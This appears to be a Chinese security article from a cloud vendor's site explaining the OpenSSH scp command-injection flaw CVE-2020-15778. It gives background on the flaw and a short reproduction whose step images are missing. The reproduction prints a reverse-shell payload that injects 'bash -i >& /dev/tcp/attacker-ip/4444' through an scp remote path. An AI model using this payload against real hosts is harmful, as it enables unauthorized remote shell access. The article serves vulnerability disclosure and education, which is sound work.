溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

發(fā)布時(shí)間:2021-12-28 17:35:15 來源:億速云 閱讀:321 作者:柒染 欄目:安全技術(shù)

本篇文章給大家分享的是有關(guān) OpenSSH命令注入漏洞CVE-2020-15778的怎么理解,小編覺得挺實(shí)用的,因此分享給大家學(xué)習(xí),希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

一、漏洞概要

2020年6月9日,研究人員Chinmay Pandya在Openssh中發(fā)現(xiàn)了一個(gè)漏洞,于7月18日公開。OpenSSH的8.3p1中的scp允許在scp.c遠(yuǎn)程功能中注入命令,攻擊者可利用該漏洞執(zhí)行任意命令。目前絕大多數(shù)linux系統(tǒng)受影響。深信服安全研究團(tuán)隊(duì)依據(jù)漏洞重要性和影響力進(jìn)行評(píng)估,作出漏洞通告。

二、漏洞分析

2.1 OpenSSH介紹
OpenSSH是用于使用SSH協(xié)議進(jìn)行遠(yuǎn)程登錄的一個(gè)開源實(shí)現(xiàn)。通過對(duì)交互的流量進(jìn)行加密防止竊聽,連接劫持以及其他攻擊。OpenSSH由OpenBSD項(xiàng)目的一些開發(fā)人員開發(fā), 并以BSD樣式的許可證提供,且已被集成到許多商業(yè)產(chǎn)品中。
2.2 漏洞描述
研究人員Chinmay Pandya在openssh的scp組件中發(fā)現(xiàn)了一個(gè)命令注入漏洞。OpenSSH的8.3p1中的scp允許在scp.c遠(yuǎn)程功能中注入命令,攻擊者可利用該漏洞執(zhí)行任意命令。目前絕大多數(shù)linux系統(tǒng)受影響。
2.2.1 scp命令簡介
scp 是 secure copy 的縮寫。在linux系統(tǒng)中,scp用于linux之間復(fù)制文件和目錄,基于 ssh 登陸進(jìn)行安全的遠(yuǎn)程文件拷貝命令。該命令由openssh的scp.c及其他相關(guān)代碼實(shí)現(xiàn)。
2.2.2 漏洞復(fù)現(xiàn)
scp命令引發(fā)的命令注入

反彈shell的payload

scp 1.txt cracer@受害機(jī)ip:'`bash -i >& /dev/tcp/攻擊機(jī)ip/4444 0>&1`/tmp/test.txt'

實(shí)戰(zhàn)測(cè)試,這里使用本機(jī)進(jìn)行測(cè)試
1、查看ssh版本,符合漏洞版本

ssh -V

OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

2、先在本地新建好文件,用于上傳

OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

3、本地開啟監(jiān)聽

OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

3、使用scp命令注入成功反彈shellOpenSSH命令注入漏洞CVE-2020-15778的怎么理解OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

以上就是 OpenSSH命令注入漏洞CVE-2020-15778的怎么理解,小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘9ぷ鲿?huì)見到或用到的。希望你能通過這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI